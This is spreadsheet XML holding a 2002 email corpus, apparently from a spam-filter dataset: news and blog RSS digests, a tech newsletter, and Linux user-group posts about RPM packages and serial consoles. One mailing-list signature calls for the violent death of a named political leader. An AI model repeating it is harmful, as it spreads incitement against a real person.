Tag&amp;Rename  \n Pretty Good Solitaire  \n Visualize Color Combos  \n FirstStop WebSearch  \n Ecobuilder  \n Book Collector  \n\n**Get Listed Here**\n\nQuestion: which group is 250,000+ strong and always looking for stuff to make\ntheir personal and professional lives run smoother?\n\n\n\nHAPPY FUN STUFF  \n  \n---  \n  \nAnd now, we see the story of the ugly shoe unfold before our very eyes. This\nfootwear was outcast from the group weeks ago, and has been very depressed\never since. Pity my shoe.\n\nThe Lone Shoe\n\n\n\n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \n\n\nBYTE ME NOW  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.  I can't seem to find time to procrastinate...\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.lockergnome.com http://www.qksrv.net http://www.geocities.com http://www.l5sg.com http://www.lockergnome.com http://www.picozip.com http://www.lockergnome.com http://www.lockergnome.com http://www.capitalintellect.net http://www.lockergnome.com http://www.lockergnome.com http://www.transloader.com http://www.lockergnome.com http://www.pixeldecor.com http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Thu, 10 Oct 2002 13:12:09 +0200</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 13:12:09 +0200</t>
  </si>
  <si>
    <t>Re: dvd::rip on Red Hat 8.0?</t>
  </si>
  <si>
    <t>Once upon a time, Michl wrote : &gt; Has anyone made a working source RPM for dvd::rip for Red Hat 8.0? I don't think I've tried yet, but if I did, I probably moved on to another package after having bumped into one of the problems you mention. If anyone sends me a patch to my spec file and eventually needed patches etc., I'd be more than glad to make a new build available. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.13 0.09 0.09 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:27 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:27 -0000</t>
  </si>
  <si>
    <t>Monster molecule techniques win Chemistry Nobel</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8701110,1440/\nDate: Not supplied\n\nThree researchers are honoured for pioneering ways of identifying large \nbiological molecules such as proteins and DNA</t>
  </si>
  <si>
    <t>US use of lie detector tests criticised</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8701111,1440/\nDate: Not supplied\n\nGovernment employees are routinely screened in a bid to spot spies - but the \ntesting is useless, says influential panel of scientists</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:26 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:26 -0000</t>
  </si>
  <si>
    <t>Malicious code hidden in email software</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8710804,1440/\nDate: Not supplied\n\nThe new software was switched for dummy code containing a "Trojan horse" on its \ndownload servers</t>
  </si>
  <si>
    <t>Critical US satellites could be hacked</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8708820,1440/\nDate: Not supplied\n\nMilitary communications could be jammed or intercepted and satellites thrown \noff course or destroyed, a new US study warns</t>
  </si>
  <si>
    <t>Australia declares world's largest marine reserve</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8704787,1440/\nDate: Not supplied\n\nThe reserve will protect the pristine habitats of a group of sub-Antarctic \nislands described as the "wildest place on Earth"</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:25 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:25 -0000</t>
  </si>
  <si>
    <t>Wannabe fathers ramp up testosterone</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8714365,1440/\nDate: Not supplied\n\nMen trying for a baby subconsciously influence their hormone levels - and thus \nsperm production - to make conception more likely</t>
  </si>
  <si>
    <t>Plan to recover nuclear gas rejected</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8714364,1440/\nDate: Not supplied\n\nThe UK Environment Agency plans to allow a trebling of emissions of a \nradioactive gas produced in reactors - a decision dubbed "spineless" by critics</t>
  </si>
  <si>
    <t>Gene technique reveals human evolution</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8714366,1440/\nDate: Not supplied\n\nA method that could allow scientists to probe our ancestors' evolution over the \nlast 20,000 years passes its first test</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:24 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:24 -0000</t>
  </si>
  <si>
    <t>'Seminal' eczema study reveals skin's broken defences</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8719499,1440/\nDate: Not supplied\n\nSufferers fail to produce effective amounts of key bacteria-killing molecules - \nthe discovery raises hopes of new treatments for millions</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:23 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:23 -0000</t>
  </si>
  <si>
    <t>Missing Fleet Week</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-09T22:10:38-08:00\n\nI'll be in Ohio this weekend for a family gathering, so I'll be missing Fleet \nWeek (Google can't find a good "official site"). Damn. I've wanted to see the \nBlue Angles again. Wow, that site sucks. And Google couldn't find...</t>
  </si>
  <si>
    <t>Good Earnings Report</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-09T20:59:51-08:00\n\nYeay! We had a good earnings report at work today. There was much happiness and \na good party after the news. I'm not quite sure how we managed that, but we're \nstill making money. I had the distinction of being...</t>
  </si>
  <si>
    <t>Twilight Zone</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-09T22:50:35-08:00\n\nMy Tivo has been picking up the Twilight Zone for the last few weeks. I have to \nsay, I'm really enjoying it. It reminds me of the old ones. It's good to have \nit back on the air....</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:10 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:10 -0000</t>
  </si>
  <si>
    <t>'Flexible' retirement gains ground</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8724000,215/\nDate: 2002-10-10T03:26:51+01:00\n\n*Money:* Government admits millions may have to work on beyond 65.</t>
  </si>
  <si>
    <t>Go-ahead for new-style hospitals</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723999,215/\nDate: 2002-10-10T03:26:52+01:00\n\n*Society:* Blair brokers Whitehall deal on trusts borrowing private cash.</t>
  </si>
  <si>
    <t>Italy goes over old battlegrounds</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8702434,215/\nDate: 2002-10-09T14:04:56+01:00\n\n*Rome dispatch: *Italy's 'post-fascist' National Alliance is behind two \ncontroversial attempts to commemorate the country's military past, writes *\nPhilip Willan*.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:09 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:09 -0000</t>
  </si>
  <si>
    <t>Meet Carol Ann Duffy</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8699227,215/\nDate: 2002-10-09T12:01:59+01:00\n\n*Live online:* One of Britain's leading poets will be here tomorrow at 2.15pm \nto celebrate National Poetry day. Post your questions now.</t>
  </si>
  <si>
    <t>Brown accused of backtracking on regional museums</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723997,215/\nDate: 2002-10-10T03:26:54+01:00\n\n*Arts:* Curators despair at 'shortfall' in chancellor's funding.</t>
  </si>
  <si>
    <t>'Bust' market closes two Powergen stations</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723998,215/\nDate: 2002-10-10T03:26:53+01:00\n\n*Business:* Powergen yesterday shut down a quarter of its generating capacity.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:08 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:08 -0000</t>
  </si>
  <si>
    <t>Musharraf keeps his hands on the reins</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723994,215/\nDate: 2002-10-10T03:26:57+01:00\n\n*World latest:* Warning to next PM as Pakistan goes to the polls.</t>
  </si>
  <si>
    <t>Now we are 10</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723996,215/\nDate: 2002-10-10T03:26:55+01:00\n\n*Media:* *Peter Preston* on the question that split the Guardian into two - \nbroadsheet and tabloid.</t>
  </si>
  <si>
    <t>Leader tells Tories: stop sniping</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723995,215/\nDate: 2002-10-10T03:26:56+01:00\n\n*Conservative party conference:* Iain Duncan Smith will today tell the Tory old \nguard to stop sniping at his policy agenda.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:04:07 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:04:07 -0000</t>
  </si>
  <si>
    <t>Monkey or man?</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723993,215/\nDate: 2002-10-10T03:26:58+01:00\n\nToumai, hailed as our oldest ancestor, is stirring ancient scientific \nrivalries.Quizzes[1]| Crossword[2]| Interactive guides[3]| Steve Bell[4]| \nWeblog[5]*Other news and comment**Blair ready to suspend Stormont*[6]\n\n[1] [URL]http://www.newsisfree.com[/URL],7476,349695,00.html\n[2] [URL]http://www.newsisfree.com[/URL],4406,180778,00.html\n[3] [URL]http://www.newsisfree.com[/URL],2759,192055,00.html\n[4] [URL]http://www.newsisfree.com[/URL],7371,337484,00.html\n[5] [URL]http://www.newsisfree.com[/URL],6798,517233,00.html\n[6] [URL]http://www.newsisfree.com[/URL],2763,808962,00.html</t>
  </si>
  <si>
    <t>http://www.newsisfree.com http://www.newsisfree.com http://www.newsisfree.com http://www.newsisfree.com http://www.newsisfree.com http://www.newsisfree.com http://www.newsisfree.com</t>
  </si>
  <si>
    <t>DNA match brings breakthrough</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723992,215/\nDate: 2002-10-10T03:26:59+01:00\n\nNew evidence in case of murdered British tourist Peter Falconio.</t>
  </si>
  <si>
    <t>CIA in blow to Bush attack plans</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8723991,215/\nDate: 2002-10-10T03:27:00+01:00\n\nUS invasion could push Saddam Hussein into retaliating with chemical or \nbiological weapons, warns CIA.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:03:47 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:03:47 -0000</t>
  </si>
  <si>
    <t>[IMG: http://www.joelonsoftware.com/pictures/dhtml2d.jpg (Dynamic</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://www.joelonsoftware.com[/URL] (Dynamic HTML, 2d \nEdition)][1]Ah! Danny Goodman has released the new version of Dynamic HTML[2]. \nIt's been a few years since the first edition, which is _still_ the best \nreference on HTML despite being severely out of date. The new edition is 1400 \npacked pages that actually tells you what web browsers that are actually in use \nactually do, which makes it invaluable. It has been brought up to date with all \nthe latest browsers and the newest HTML specs. If you're working with HTML \nin any way, shape, or form, this book is an absolute requirement.\n\n\n\n[1] [URL]http://www.amazon.com[/URL]\n[2] [URL]http://www.amazon.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://www.joelonsoftware.com http://www.amazon.com http://www.amazon.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>Five</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-09T10:25:09-05:00\n\n- _OSNews.com_: Red Hat 8.0 for KDE Users (and Newbies)[1]. \n- _Aaron Swartz_: Trip notes[2]. \n- _Sean Palmer_: The Semantic Web in Haiku[3]. \n- _Shelley Powers_: The Parable of the Languages[4]. \n- _Heather Hamilton_: You only get five[5]. (Mira Sorvino[6], Portia de Rossi\n[7], Stockard Channing[8], Jeri Ryan[9] Nigella Lawson[10], and Angelina Jolie\n[11]. D gave me her list but wouldn't let me post it. Meh.) \n\n\n\n\n\n[1]  [URL]http://www.osnews.com[/URL]\n[2]  [URL]http://www.aaronsw.com[/URL]\n[3]  [URL]http://infomesh.net[/URL]\n[4]  [URL]http://weblog.burningbird.net[/URL]\n[5]  [URL]http://www.dooce.com[/URL]\n[6]  [URL]http://www.elegantwomen.net[/URL]\n[7]  [URL]http://www.safesearching.com[/URL]\n[8]  [URL]http://images.amazon.com[/URL]\n[9]  [URL]http://www.elegantwomen.net[/URL]\n[10] [URL]http://www.stylenetwork.com[/URL]\n[11] [URL]http://www.elegantwomen.net[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.osnews.com http://www.aaronsw.com http://infomesh.net http://weblog.burningbird.net http://www.dooce.com http://www.elegantwomen.net http://www.safesearching.com http://images.amazon.com http://www.elegantwomen.net http://www.stylenetwork.com http://www.elegantwomen.net</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 10 Oct 2002 08:00:03 -0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 08:00:03 -0000</t>
  </si>
  <si>
    <t>Six</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-09T19:54:41-05:00\n\nActually, 5.6. I clocked my &amp;#8220;long loop&amp;#8221; today and discovered that \nthe run I thought was 6 miles is actually only 5.6. And the &amp;#8220;short \nloop&amp;#8221; I thought was 5 miles is actually only 4.6. I have an off-by-0.4 \nbug. This is very upsetting. I've lost 0.4 miles somewhere. If anyone finds \nthem, can you please let me know? Thank you. \n\nI ran 9 miles last week, and 10 so far this week, even taking into account my \noff-by-0.4 bug. I fear I am turning into a runner. My father and I made fun of \nrunners when I was growing up. He used to say that you never saw a runner \nsmiling. We'd drive by runners, point at them, and say, &amp;#8220;Look, another \nrunner... not smiling!&amp;#8221; This weighed heavily on my psyche in my formative \nyears. So it is with some measure of shame that I admit that I am becoming a \nrunner. \n\nBecoming a runner is actually not that difficult. Not surprisingly, it involves \nrunning. There's other stuff, too, eventually, but running is the important \npart. If you can run a mile, run a mile. If you can only run around the block, \nrun around the block. Tomorrow you'll run around the block, and the next day \nyou'll find you can run around two blocks. And next week you'll find you can \nrun a mile. Then one day you'll run a mile, then stop to catch your breath, \nthen get invigorated and run another mile. \n\nAnd then you're a runner. That's it, really. It's not complicated. You run, and \nyou run, and you run. And one day, you discover that shoes are important, and \nthat the old sneakers you threw on the first time you tried out this running \nthing out aren't actually very good for running. So you go buy new shoes, and \nyou run, and you run, and you run. And later, you discover that stretching is \nimportant too, so you stretch and run, and stretch and run, and stretch and \nrun. \n\nThere's other stuff too, but it doesn't really matter until you're already a \nrunner. You learn about differences in running surfaces. And how many miles you \nshould really put on one pair of shoes. And when in the day you should run to \nmaximize calorie burning. And how to train for a marathon, and so forth. Don't \nworry about any of that now. Just run. Running is key. Otherwise you're just \nanother fat schmuck lying on the couch reading _Runner's World_.</t>
  </si>
  <si>
    <t>http://diveintomark.org</t>
  </si>
  <si>
    <t>Wedding music</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-09T23:41:26-05:00\n\nIt's confirmed: Dora and I will be walking down the aisle to the sounds of the \nTriangle Tuba Quartet[1]. That is just too cool for words.\n\n\n\n[1] [URL]http://www.duke.edu[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.duke.edu</t>
  </si>
  <si>
    <t>Words fail me</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-10T02:34:18-05:00\n\n_The Morning News_: Rosencrantz &amp; Joshua[1]. Words fail me, which is a rare \nand pleasant gift, thank you. Instead, I will simply take this opportunity to \nquote the original _Rosencrantz &amp; Guildenstern Are Dead_, the excellent \nplay by Tom Stoppard which I keep nestled in my one remaining bookshelf[2] \nbetween the _Tao Te Ching_ and Roald Dahl's _Charlie and the Chocolate Factory_\n. \n\n    Guil: Exactly, it's a matter of asking the right questions and giving away \n    as little as we can. It's a game.\n    Ros: And then we can go?\n    Guil: And receive such thanks as fits a king's remembrance.\n    Ros: I like the sound of that. Waht do you think he meant by remembrance?\n    Guil: He doesn't forget his friends.\n    Ros: Would you care to estimate?\n    Guil: Difficult to say, really&amp;#8212;some kings tend to be amnesiac, others \n    I suppose&amp;#8212;the opposite, whatever that is...\n    Ros: Yes&amp;#8212;but&amp;#8212;\n    Guil: Elephantine... ?\n    Ros: Not how long&amp;#8212;how much?\n    Guil: _Retentive_&amp;#8212;he's a very retentive king, a royal retainer...\n    Ros: What are you playing at?\n    Guil: Words, words. They're all we have to go on. \n\n\n\n\n\n[1] [URL]http://www.themorningnews.org[/URL]\n[2] [URL]http://diveintomark.org[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.themorningnews.org http://diveintomark.org</t>
  </si>
  <si>
    <t>To: RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Thu, 10 Oct 2002 04:22:48 +1300</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 04:22:48 +1300</t>
  </si>
  <si>
    <t>KVim 6.1.141</t>
  </si>
  <si>
    <t>Any one out their have any RPMs for the new KVim that was just released  that'd be suitable for RH7.3? The website ( [URL]http://freehackers.org[/URL] ) mentions some  experimental RPMs for Suse/COnnectiva/Slackware but none for Mandrake...                                     -- \m/ --                     ...in 29 days - The Odyssey begins...                                 [URL]www.symphonyx.com[/URL]          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://freehackers.org www.symphonyx.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 10 Oct 2002 02:00:35 +0000</t>
  </si>
  <si>
    <t>Thu, 10 Oct 2002 02:00:35 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-10-10</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * TPF October Newsletter\n\n+--------------------------------------------------------------------+\n| TPF October Newsletter                                             |\n|   posted by pudge on Tuesday October 08, @22:35 (links)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]delegatrix writes "The October edition of the [1]Perl Foundation\nnewsletter has been posted. This newsletter includes an interview with\nWhite Camel winner Tim Maher."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:lisa@perl.org\n    1. [URL]http://perlfoundation.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perlfoundation.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Thu, 1 Aug 2002 18:37:32 -0500</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 18:37:32 -0500</t>
  </si>
  <si>
    <t>On Thu, 1 Aug 2002 17:10:48 +0100, John Hinsley  wrote: &gt; No, the problem is that what plip expects is GL/glut.h (amongst other things)  &gt; which were there in 7.2 but have vanished in 7.3.      Yeah, I know what you mean.  Here's the trick:     Remove the Nvidia drivers. Yeah, I know it's a pain...     Load BOTH mesa, mesa-demos and basically everything that comes in the mesa rpm.        THEN load NVidia; it'll know what to do.     ...but it seems like I had to do this on 7.2, too. ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I don't want to hear news from Isreal until the news contains the words "Bullet", "Brain", and "Arafat". _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 1 Aug 2002 17:44:20 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 17:44:20 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Re: serial console question</t>
  </si>
  <si>
    <t>On Thu, Aug 01, 2002 at 05:41:03PM +0100, Paul Mc Auley mentioned: &gt; On Thu, 1 Aug 2002 17:15:27 +0100  &gt; | S+#_+q_x0001_ INET __+_:  &gt; | S+#_+q_x0001_ p_x0001___ M++q_x0001_ _++ +_&lt;_++_. &gt; | S+#_+q_x0001_ #+__+ S+#_+q_x0001_ #+ + __+_:  &gt; | I+#+ _+#+_ _ +# _+ -- N+ _+#_+q_x0001_ SSL &gt;  &gt; |  So it looks like some sort of setting mismatch. Various places on the web &gt; | say that cobalts are setup with 115200 8n1 serial ports, but someone could &gt; | have changed it on this particular box. &gt;  &gt; |  Anyone care to guess what's up ? &gt;  &gt; One possible is that it's toggling the VTx00 alt character set. If  &gt; that's the case, feeding ^O to the tty somehow (i.e. cat to the device)  &gt; should flip it back.  Ah right. Seems OK now. I assume that could have happened if the terminal was in 9600 mode at first, getting wierd characters ? Kate --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 1 Aug 2002 17:43:32 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 17:43:32 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] stupid pics of the day</t>
  </si>
  <si>
    <t>On Thu, Aug 01, 2002 at 04:03:07PM +0100, Padraig Brady mentioned:\n&gt; Some local Irish wildlife\n&gt; \n&gt; [URL]http://www.iol.ie[/URL]\n&gt; [URL]http://www.iol.ie[/URL]\n&gt; \n&gt; was I bored or what?\n\n Most likely.\n\n Hey...is that one of my nice wai-yip stuffed ones ?\n\nKate\n \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.iol.ie http://www.iol.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: yyyycc &lt;yyyycc@hackwatch.com&gt;\nDate: Thu, 1 Aug 2002 17:36:48 +0100 (IST)</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 17:36:48 +0100 (IST)</t>
  </si>
  <si>
    <t>yyyycc &lt;yyyycc@hackwatch.com&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] serial console question</t>
  </si>
  <si>
    <t>On Thu, 1 Aug 2002, John P. Looney wrote:\n\n&gt;  I've found a decrepit raq3 that I'm going to resurrect, as soon as I work\n&gt; out what's up with the console.\n&gt; \n&gt;  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:\n\nShould it be 38K4 - a fairly common baudrate for serial port\nconnections? Though if you are getting this much, the baudrate\nmay be right. It looks like high ASCII so it may also be worth\nplaying with the tty type (ANSI/VT etc).\n\n&gt;  So it looks like some sort of setting mismatch. Various places on the web\n&gt; say that cobalts are setup with 115200 8n1 serial ports, but someone could\n&gt; have changed it on this particular box.\n\nRegards...jmcc\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Lars Hecking &lt;lhecking@nmrc.ie&gt;\nDate: Thu, 1 Aug 2002 17:35:51 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 17:35:51 +0100</t>
  </si>
  <si>
    <t>Lars Hecking &lt;lhecking@nmrc.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Re: Csh shell scripts</t>
  </si>
  <si>
    <t>&gt; quickie for shell scripters:\n&gt; How do I find out the time a file was created at?\n \n There is no canonical test, and the information is not necessarily\n available. If you check out how struct stat is defined on your system,\n you'll find that only\n\n     time_t   st_atime;    /* Time of last access */\n     time_t   st_mtime;    /* Time of last data modification */\n     time_t   st_ctime;    /* Time of last file status change */\n                           /* Times measured in seconds since */\n                           /* 00:00:00 UTC, Jan. 1, 1970 */\n\n are available. File status change = i-node status change, it includes\n creation, mode change, ownership change etc., so this is what you want\n only if the file status wasn't changed since creation.\n\n This information is also shown by ls -lc, but parsing ls' output requires\n a bit of effort. I'd rather recommend to write a short C program to access\n the file status directly, and output the ctime directly (seconds since\n the epoch, i.e. perfect for numerical comparison).\n\n (Another way is to use GNU find -printf with a custom format:\n  ...\n            %c   File's last  status  change  time  in  the  format\n               returned by the C `ctime' function.\n ...)\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 1 Aug 2002 17:15:27 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 17:15:27 +0100</t>
  </si>
  <si>
    <t>[ILUG] serial console question</t>
  </si>
  <si>
    <t>I've found a decrepit raq3 that I'm going to resurrect, as soon as I work out what's up with the console.  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like: S+#_+q_x0001_ INET __+_:  S+#_+q_x0001_ p_x0001___ M++q_x0001_ _++ +_&lt;_++_. S+#_+q_x0001_ #+__+ S+#_+q_x0001_ #+ + __+_:  I+#+ _+#+_ _ +# _+ -- N+ _+#_+q_x0001_ SSL /+__/_/++ S++q_x0001_ + P_+_SQL: FATAL: S+_#+S_+_P_+: () #+: A___ #+_#&lt;  +_         I_ #+_ _++#_+_ #+_#&lt; _+q_x0001_  +#+ _+?         I +, _++ _++  (/++/._.PGSQL.5583) # _+_&lt;. /+__//_++#_+_: #+ _#+ UNIX _+_#+ _+  [616] S+#_+q_x0001_ ++ S++q_x0001_ + W S_+:   So it looks like some sort of setting mismatch. Various places on the web say that cobalts are setup with 115200 8n1 serial ports, but someone could have changed it on this particular box.  Anyone care to guess what's up ? John --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: webdev@linux.ie\nFrom: Lars Hecking &lt;lhecking@nmrc.ie&gt;\nDate: Thu, 1 Aug 2002 17:09:29 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 17:09:29 +0100</t>
  </si>
  <si>
    <t>[Webdev] php-mailsettings anyone?</t>
  </si>
  <si>
    <t>Hi all,\n\n I'm looking for a copy of the php-mailsettings package, or PHP Cyrus-Tools,\n which should include the former. All web references point to the canonical\n location, which is unavailable. Author hasn't responded either.\n\n Thanks!\n\n\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Niall O Broin &lt;niall@linux.ie&gt;\nDate: Thu, 1 Aug 2002 15:51:12 +0100</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 15:51:12 +0100</t>
  </si>
  <si>
    <t>[ILUG] Strange ssh problem</t>
  </si>
  <si>
